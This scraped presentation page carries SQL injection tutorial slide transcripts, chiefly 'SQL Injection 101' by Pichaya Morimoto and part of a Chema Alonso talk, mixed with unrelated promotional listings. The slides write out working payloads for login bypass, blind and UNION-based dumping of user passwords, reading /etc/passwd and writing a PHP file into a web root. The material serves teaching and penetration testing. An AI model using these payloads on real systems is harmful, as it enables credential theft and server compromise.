SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
In this presentation I covered almost all basic details about SQL Injection. So you can get best knowledge about SQL Injection (SQLI).
This presentation contains animation so try out it on PC's.
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
In this presentation I covered almost all basic details about SQL Injection. So you can get best knowledge about SQL Injection (SQLI).
This presentation contains animation so try out it on PC's.
• What is SQL injection ?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect Web Application from SQL injection.
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
An overview of techniques for defending against SQL Injection using Python tools. This slide deck was presented at the DC Python Meetup on October 4th, 2011 by Edgar Roman, Sr Director of Application Development at PBS
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from
database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
• What is SQL injection ?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect Web Application from SQL injection.
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
An overview of techniques for defending against SQL Injection using Python tools. This slide deck was presented at the DC Python Meetup on October 4th, 2011 by Edgar Roman, Sr Director of Application Development at PBS
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from
database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
SQL Injection
Project for lecture "Computer Systems Security"
You can find a SQL Injection Attack with sqlmap here: http://www.youtube.com/watch?v=wAwUv5dzwLk
It was performed for educational purposes ONLY.
With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
Protecting Your Web Site From SQL Injection & XSSskyhawk133
The UNM Information Architects and the UNM Arts LAB invite you to to a presentation by ABQ Web Geeks' own Chris Kenworthy at the UNM SUB this Wednesday the 27th of August.
Chris will be discussing SQL Injection and Cross Site Scripting Vulnerabilities.
These types of attacks against websites are both common and potentially devastating. Chris will bring us up to speed on them and give us some tips on how to prevent them.
Please mark your calendars for Wednesday, August 27 from 10:00 - 11:30 at the UNM Student Union Building, Lobo Rooms A & B.
How to Become a Thought Leader in Your NicheLeslie Samuel
Are bloggers thought leaders? Here are some tips on how you can become one. Provide great value, put awesome content out there on a regular basis, and help others.
Topic: Art of Web Backdoor
Speaker: Pichaya Morimoto
Event: 2600 Thailand Meeting #5
Date: September 6, 2013
Video: https://www.youtube.com/watch?v=QIXTPPBfLyI
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
How "·$% developers defeat the web vulnerability scannersChema Alonso
Share Favorite
Favorited X
Download More...
Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel
Edit your favorites Cancel
Send to your Group / Event Select Group / Event
Add your message Cancel
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com
Without related presentations
0 commentsPost a comment
Post a comment
..
Embed Video Subscribe to follow-up comments Unsubscribe from followup comments .
Edit your comment Cancel .Notes on slide 1
no notes for slide #1
no notes for slide #1
..Favorites, Groups & Events
more
How "·$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica
2.Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavey Queries
5.- Conclusions
3.1.-Introduction
4.SQL Injection is still here among us
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs
6.Need to Improve Automatic Scanning
Not always a manual scanning is possible
Time
Confidentiality
Money, money, money…
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.
7.2.-Inverted Queries
8.
9.Homers, how are they?
Lazy
Bad trainined
Poor Experience in security stuff
Don´t like working
Don´t like computing
Don´t like coding
Don´t like you!
10.Flanders are Left-handed
11.Right
SELECT UID
FROM USERS
WHERE NAME=‘V_NAME’
AND
PASSWORD=‘V_PASSW’;
12.Wrong?
SELECT UID
FROM USERS
WHERE ‘V_NAME’=NAME AND
‘ V_PASSW’=PASSWORD
13.Login Inverted Query
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1
Select uid
From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password
FAIL
14.Login Inverted SQL Injection an example
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica
Select uid
From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password
Success
15.Blind Attacks
Attacker injects code but can´t access directly to the data.
However this injection changes the behavior of the web application.
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
Blind SQL Injection
Biind Xpath Injection
Blind LDAP Injection
16.Blind SQL Injection Attacks
Attacker injects:
“ True where clauses”
“ False where clauses“
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
Program doesn’t return any visible data from database or data in error messages.
The attacker can´t see any data extracted from the database.
17.Blind SQL Injection Attacks
Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:
Different hashes
Different html structure
Different patterns (keywords)
Different linear ASCII sums
“ Different behavior”
By example: Response Time
18.Blind SQL Injection Attacks
If any difference exists, then:
Attacker can extract all information from database
How? Using “booleanization”
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
“ True-Answer Page” or “False-Answer Page”?
MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
Oracle:
Program.php?id=1 and 100>(Select ASCII(Sub
Mike Creuzer's presentation from the December, 2009 Suburban Chicago PHP & Web Dev Meetup. The topic is SQL injection in PHP and common PHP content management systems.
Visit Mike's blog at http://mike.creuzer.com/
In this lecture you will study about
Google Dorks
Types of Google Dorks
SQL injection
Types of SQL injection
Defending against SQL injection
GOOGLE DORKS
inurl
intitle
allintitle
allinurl
filetype or ext
allintext
intext
SQL INJECTION
What are injection attacks?
How SQL Injection Works
Exploiting SQL Injection Bugs
Mitigating SQL Injection
Defending Injection Attacks
Similar to SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto (20)
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Anthony Dahanne
Les Buildpacks existent depuis plus de 10 ans ! D’abord, ils étaient utilisés pour détecter et construire une application avant de la déployer sur certains PaaS. Ensuite, nous avons pu créer des images Docker (OCI) avec leur dernière génération, les Cloud Native Buildpacks (CNCF en incubation). Sont-ils une bonne alternative au Dockerfile ? Que sont les buildpacks Paketo ? Quelles communautés les soutiennent et comment ?
Venez le découvrir lors de cette session ignite
Field Employee Tracking System| MiTrack App| Best Employee Tracking Solution|...informapgpstrackings
Keep tabs on your field staff effortlessly with Informap Technology Centre LLC. Real-time tracking, task assignment, and smart features for efficient management. Request a live demo today!
For more details, visit us : https://informapuae.com/field-staff-tracking/
Software Engineering, Software Consulting, Tech Lead.
Spring Boot, Spring Cloud, Spring Core, Spring JDBC, Spring Security,
Spring Transaction, Spring MVC,
Log4j, REST/SOAP WEB-SERVICES.
Listen to the keynote address and hear about the latest developments from Rachana Ananthakrishnan and Ian Foster who review the updates to the Globus Platform and Service, and the relevance of Globus to the scientific community as an automation platform to accelerate scientific discovery.
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteGoogle
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
👉👉 Click Here To Get More Info 👇👇
https://sumonreview.com/ai-pilot-review/
AI Pilot Review: Key Features
✅Deploy AI expert bots in Any Niche With Just A Click
✅With one keyword, generate complete funnels, websites, landing pages, and more.
✅More than 85 AI features are included in the AI pilot.
✅No setup or configuration; use your voice (like Siri) to do whatever you want.
✅You Can Use AI Pilot To Create your version of AI Pilot And Charge People For It…
✅ZERO Manual Work With AI Pilot. Never write, Design, Or Code Again.
✅ZERO Limits On Features Or Usages
✅Use Our AI-powered Traffic To Get Hundreds Of Customers
✅No Complicated Setup: Get Up And Running In 2 Minutes
✅99.99% Up-Time Guaranteed
✅30 Days Money-Back Guarantee
✅ZERO Upfront Cost
See My Other Reviews Article:
(1) TubeTrivia AI Review: https://sumonreview.com/tubetrivia-ai-review
(2) SocioWave Review: https://sumonreview.com/sociowave-review
(3) AI Partner & Profit Review: https://sumonreview.com/ai-partner-profit-review
(4) AI Ebook Suite Review: https://sumonreview.com/ai-ebook-suite-review
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfJay Das
With the advent of artificial intelligence or AI tools, project management processes are undergoing a transformative shift. By using tools like ChatGPT, and Bard organizations can empower their leaders and managers to plan, execute, and monitor projects more effectively.
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns
Unlocking Business Potential: Tailored Technology Solutions by Prosigns
Discover how Prosigns, a leading technology solutions provider, partners with businesses to drive innovation and success. Our presentation showcases our comprehensive range of services, including custom software development, web and mobile app development, AI & ML solutions, blockchain integration, DevOps services, and Microsoft Dynamics 365 support.
Custom Software Development: Prosigns specializes in creating bespoke software solutions that cater to your unique business needs. Our team of experts works closely with you to understand your requirements and deliver tailor-made software that enhances efficiency and drives growth.
Web and Mobile App Development: From responsive websites to intuitive mobile applications, Prosigns develops cutting-edge solutions that engage users and deliver seamless experiences across devices.
AI & ML Solutions: Harnessing the power of Artificial Intelligence and Machine Learning, Prosigns provides smart solutions that automate processes, provide valuable insights, and drive informed decision-making.
Blockchain Integration: Prosigns offers comprehensive blockchain solutions, including development, integration, and consulting services, enabling businesses to leverage blockchain technology for enhanced security, transparency, and efficiency.
DevOps Services: Prosigns' DevOps services streamline development and operations processes, ensuring faster and more reliable software delivery through automation and continuous integration.
Microsoft Dynamics 365 Support: Prosigns provides comprehensive support and maintenance services for Microsoft Dynamics 365, ensuring your system is always up-to-date, secure, and running smoothly.
Learn how our collaborative approach and dedication to excellence help businesses achieve their goals and stay ahead in today's digital landscape. From concept to deployment, Prosigns is your trusted partner for transforming ideas into reality and unlocking the full potential of your business.
Join us on a journey of innovation and growth. Let's partner for success with Prosigns.
How Recreation Management Software Can Streamline Your Operations.pptxwottaspaceseo
Recreation management software streamlines operations by automating key tasks such as scheduling, registration, and payment processing, reducing manual workload and errors. It provides centralized management of facilities, classes, and events, ensuring efficient resource allocation and facility usage. The software offers user-friendly online portals for easy access to bookings and program information, enhancing customer experience. Real-time reporting and data analytics deliver insights into attendance and preferences, aiding in strategic decision-making. Additionally, effective communication tools keep participants and staff informed with timely updates. Overall, recreation management software enhances efficiency, improves service delivery, and boosts customer satisfaction.
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoamtakuyayamamoto1800
In this slide, we show the simulation example and the way to compile this solver.
In this solver, the Helmholtz equation can be solved by helmholtzFoam. Also, the Helmholtz equation with uniformly dispersed bubbles can be simulated by helmholtzBubbleFoam.
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Globus
Large Language Models (LLMs) are currently the center of attention in the tech world, particularly for their potential to advance research. In this presentation, we'll explore a straightforward and effective method for quickly initiating inference runs on supercomputers using the vLLM tool with Globus Compute, specifically on the Polaris system at ALCF. We'll begin by briefly discussing the popularity and applications of LLMs in various fields. Following this, we will introduce the vLLM tool, and explain how it integrates with Globus Compute to efficiently manage LLM operations on Polaris. Attendees will learn the practical aspects of setting up and remotely triggering LLMs from local machines, focusing on ease of use and efficiency. This talk is ideal for researchers and practitioners looking to leverage the power of LLMs in their work, offering a clear guide to harnessing supercomputing resources for quick and effective LLM inference.
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxrickgrimesss22
Discover the essential features to incorporate in your Winzo clone app to boost business growth, enhance user engagement, and drive revenue. Learn how to create a compelling gaming experience that stands out in the competitive market.
How to Position Your Globus Data Portal for Success Ten Good PracticesGlobus
Science gateways allow science and engineering communities to access shared data, software, computing services, and instruments. Science gateways have gained a lot of traction in the last twenty years, as evidenced by projects such as the Science Gateways Community Institute (SGCI) and the Center of Excellence on Science Gateways (SGX3) in the US, The Australian Research Data Commons (ARDC) and its platforms in Australia, and the projects around Virtual Research Environments in Europe. A few mature frameworks have evolved with their different strengths and foci and have been taken up by a larger community such as the Globus Data Portal, Hubzero, Tapis, and Galaxy. However, even when gateways are built on successful frameworks, they continue to face the challenges of ongoing maintenance costs and how to meet the ever-expanding needs of the community they serve with enhanced features. It is not uncommon that gateways with compelling use cases are nonetheless unable to get past the prototype phase and become a full production service, or if they do, they don't survive more than a couple of years. While there is no guaranteed pathway to success, it seems likely that for any gateway there is a need for a strong community and/or solid funding streams to create and sustain its success. With over twenty years of examples to draw from, this presentation goes into detail for ten factors common to successful and enduring gateways that effectively serve as best practices for any new or developing gateway.
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Globus
The Earth System Grid Federation (ESGF) is a global network of data servers that archives and distributes the planet’s largest collection of Earth system model output for thousands of climate and environmental scientists worldwide. Many of these petabyte-scale data archives are located in proximity to large high-performance computing (HPC) or cloud computing resources, but the primary workflow for data users consists of transferring data, and applying computations on a different system. As a part of the ESGF 2.0 US project (funded by the United States Department of Energy Office of Science), we developed pre-defined data workflows, which can be run on-demand, capable of applying many data reduction and data analysis to the large ESGF data archives, transferring only the resultant analysis (ex. visualizations, smaller data files). In this talk, we will showcase a few of these workflows, highlighting how Globus Flows can be used for petabyte-scale climate analysis.
Accelerate Enterprise Software Engineering with PlatformlessWSO2
Key takeaways:
Challenges of building platforms and the benefits of platformless.
Key principles of platformless, including API-first, cloud-native middleware, platform engineering, and developer experience.
How Choreo enables the platformless experience.
How key concepts like application architecture, domain-driven design, zero trust, and cell-based architecture are inherently a part of Choreo.
Demo of an end-to-end app built and deployed on Choreo.
4. What is SQL Injection
“A SQL injection attack consists
of insertion or "injection" of a
SQL query via the input data from
the client to the application.”
- https://www.owasp.org/index.php/SQL_Injection
Web
Application
User inject a specially
crafted SQL as input to
manipulate results
Application Users
via client programs
Input Entry Points
(Search box, Forms, Article ID,
Session ID, HTTP headers etc.)
Database
6. Impact on SQL Injection
In general, consider SQL Injection a high impact severity.
Technical Impacts Business Impacts
★ Data losses
★ Bypass Authentications
★ Denial of access
★ Lead to host takeover
★ All data could be stolen,
modified, or deleted.
★ Could your reputation be
harmed?
* https://www.owasp.org/index.php/Top_10_2013-A1-Injection
* https://www.owasp.org/index.php/SQL_Injection
7. Exploitation Complexity
95% 4% 1%
Very Hard Lunatic
Easy (Required
an Expert)
(Maze queries, 2nd order,
Blind, Complex App Logic,
Bypass Filters/WAF etc.)
SQL injection with Havij by 3 year old
8. A Ton of Tools
★ Automated SQL injection Tools
SQLMap, Havij, BBQSQL, SQLNinja, SQLiX,
BobCat, bSQLHacker, bSQLbf, Absinthe,
SQLBrute, Squeeza, SQL Power Injector etc.
★ Web Vulnerability Scanner
○ Commercial
Acunetix, Netsparker, IBM AppScan,HP Fortify,
HP WebInspect, BurpSuite Pro, Qualys WAS etc.
○ Free
W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
11. Tools there, why learn to SQLi?
1. When tools failed to exploit?
2. False Positive
★ Complex Database Query
★ Complex Application Logic
★ Encodings & Blacklist Filters
★ Post Authen-ed
★ Anti-CSRF Token
★ Non-SELECT statements
★ Programmer is so indy
3. It’s just fun, and sometimes can make good money...
In case you are penetration tester, or just a Zero-day hunter ;)
Popular websites already scanned by those available tools.
It is very challenge, if you can find flaws that overlooked by tools.
12. Quote from a Hacker
“แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่
แฮกเว็บได้ 1,000 เว็บ แต่เป็น
แฮกเกอร์ที่แฮกเว็บเดิมได้
1,000 ครั้ง โดยที่โดน
แพทช์ไปแล้วทุกครั้ง”
ตาเล็ก Windows98SE
14. Boolean-based blind technique
★ Inject SQL string to control result to be
TRUE or FALSE using boolean algebra
★ You can determine whether T/F based on
analysis of HTTP responses
(string/regex/page length/HTTP status)
★ Retrieve arbitrary data:
○ Sub-Queries with “SELECT” +
Conditions (CASE-WHEN, IF-THEN)
15. Example of Vulnerable Code
User Input
TITLE
insert into
SQL query
TRUE case : title = naruto FALSE case : title = abc123
16. Boolean-based blind : Probe
★ title = naruto
SQL : SELECT * FROM bookshop WHERE title='naruto'
Result : found (TRUE)
★ title = abc123
SQL : SELECT * FROM bookshop WHERE title='abc123'
Result : not found (FALSE)
★ title = naruto' and '1'='1
SQL : ..WHERE title='naruto' and '1'='1'
Result : found (TRUE)
★ title = naruto' and 1=2-- -
SQL : ..WHERE title='naruto' and 1=2-- -'
Result : found (FALSE)
Insert another
TRUE condition
connected with
‘AND’
operator
MySQL
comments
-- -
#
/**/
T & T = T
T & F = F
17. Boolean-based blind : Exploit
★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- -
Result: found (TRUE)
★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- -
Result: not found (FALSE)
★ title=naruto' and 'cat'=
(if(database()='owasp_db','cat','dog'))-- -
Result: found (TRUE)
★ title=naruto' and 'cat'=
(if(mid(database(),1,1)='a','cat','dog'))-- -
Result: not found (not starts with ‘a’) … b … c ...
★ title=naruto' and 'cat'=
(if(mid(database(),1,1)='o','cat','dog'))-- -
MySQL IF function
IF(
<condition>,
<return when TRUE>,
<return when FALSE>
)
MySQL substring
functions
1. SUBSTRING
(str, pos, len)
2. SUBSTR
(str, pos, len)
3. MID(str, pos, len)
Result: found (starts with ‘o’), then go to next character.
18. Example of Vulnerable Code
$email=$_POST['email'];
$password=$_POST['password'];
$sql="SELECT * FROM users WHERE (email='$email')";
$sql.=" AND (password='$password')";
$result = mysql_query($sql);
if(mysql_num_rows($result)){
die(header('location: member.php'));
}else{
die(header('HTTP/1.0 401 Unauthorized'));
}
True (Login successful)
HTTP/1.1 302 Found
location: member.php
False (Login failed)
HTTP/1.0 401
Unauthorized
Unvalidated
User Input
Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1"
… WHERE (email='a') AND (password='')||(2>'1')
Always TRUE
19. Boolean-based blind : Exploit
password=1' or
2>(if(mid((select password from users),1,1)='a',1,3))-- -
HTTP/1.0 401 Unauthorized
Char Pos : 1
password=1' or
from first record of password column
2>(if(mid((select password from users),1,1)='b',1,3))-- -
HTTP/1.0 401 Unauthorized
...
password=1' or
2>(if(mid((select password from users),1,1)='t',1,3))-- -
HTTP/1.1 302 Found
location: member.php
If Char Pos 1 equals to ‘a’ then
return 1, otherwise return 3
When result is in TRUE case
that means 1st char is current value ( ‘t’ )
20. Boolean-based blind : Exploit
password=1' or
2>(if(mid((select password from users),2,1)='a',1,3))-- -
HTTP/1.0 401 Unauthorized
Go To
next
Repeat steps until you character
get all text from the
results!
Tip: Find length(<query>)
21. Boolean-based blind : Exploit
Look for automate way ? if the flaw is not too
complicate then we can just switch to SQLMap.
But keep in mind, there are A LOT of tricky
patterns that tools cannot figure out how to evaluate
as TRUE or FALSE, so just write your own script!
Faster blind test algorithms:
★ Bisection algorithm (binary search)
★ Bit-shift algorithm
★ Regular Expression search
22. Error-based : Concept
★ Inject specially crafted invalid SQL syntax
★ Ideally, force web application to expose
Error Message which contains
the injection results
★ Methods depend solely on DBMS
★ Rarely found in production webapps
23. Example of Vulnerable Code
function search_book($title){
global $con;
$sql = "SELECT * FROM bookshop WHERE title='".$title."'";
$result = mysql_query($sql) or die(mysql_error($con));
if(mysql_num_rows($result)){
return 'found';
}else{
return 'not found';
}
Show Database Error
Message when query
result in an error
}
$book_title = $_GET['title'];
$book_status = search_book($book_title);
echo '<h1>Result: '.$book_status.'</h1>';
25. Error-based : Exploit
http://url/searchbook.php?title='
and extractvalue(rand(),
concat(0x3a,
(select concat_ws(0x3a,email,password)
from users limit 2,1)
))-- -
Caution
Error messages
has limit number
of allowed length,
so what?
length() + mid() ;)
26. Time-based blind : Concept
★ Inject valid SQL string to
○ wait for few seconds in TRUE
conditions and …
○ longer/shorter delay for FALSE
★ Analysis on response time to determine
the result of queries
★ Take long time to get result but very
useful to hack completely blind flaws
29. Time-based blind : Exploit
Write a script to automate the attack !
For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
31. UNION query-based : Concept
★ Most popular method found in SQL
injection tutorials from Google/YouTube
★ Inject valid SQL string by making the
left-side SELECT to be false and then
insert “UNION” with another right-side
SELECT query using same number of
columns contain what you want to fetch.
33. UNION query-based : Exploit
Step 1 : Find columns of left SELECT statement using ‘ORDER BY’
http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- -
There are column no. 1 - 4 in
underlying SELECT query
There is no 5th
column. If db error
msg on, u will see:
Unknown column '5' in
'order clause'
34. UNION query-based : Exploit
Step 2.1 : We do not need result from 1st SELECT SQL query so
discard it with ‘always FALSE’ condition.
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- -
Step 2.2 : Insert 2nd SELECT SQL query separated by UNION
http://owasp-sqli.local/showbook.php?author=longcat' and 1>2
UNION select 1,2,3,4-- -
Result of
“SELECT
1,2,3,4” will
replace where
the result of 1st
SELECT was.
35. UNION query-based : Exploit
Exploit : http://owasp-sqli.
local/showbook.php
?author=longcat' and 1>2 union
select user(),database(),version(),
(select group_concat(email,
password) from users)--+-
Tips: Database Meta Data
select database()
select table_name from
information_schema.tables
select column_name from
information_schema.columns
36. Stacked Queries : Concept
★ Append another query into the injection
★ Not All DBMS drivers/API support
stacked queries
★ Very Effective for MS-SQL, SQLite
Attack Scenario:
User Input = 123
SQL: SELECT email FROM users where id=123
User Input = 456; DROP table users
SQL: ... users where id=456; DROP table users
39. Privilege Escalation
★ Read credential from configuration files
★ Create Accessible Web Backdoor
★ Arbitrary OS command execution
40. SQL Injection : Read File
Exploit: http://owasp-sqli.local/showbook.php
?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
41. SQL Injection : Write File
Exploit: http://owasp-sqli.local/showbook.php
?author=longcat' and 1>2 union select
0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile
'/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
42. SQL Injection : OS CMD Shell
1. Write File > Web Backdoor
( ex. http://youtube.com/watch?v=QIXTPPBfLyI )
2. Built-in OS command functions / UDF
MS-SQL xp_cmdshell
43. Advanced Attacks
★ MySQL Second Order SQL Injection
★ Abusing PHP PDO prepared statements
★ Making a Backdoor with SQLite
★ How a hashed string causes SQL Injection flaw
★ Account Takeover with SQL Truncation Attack
★ CodeIgniter Active Record Bypass
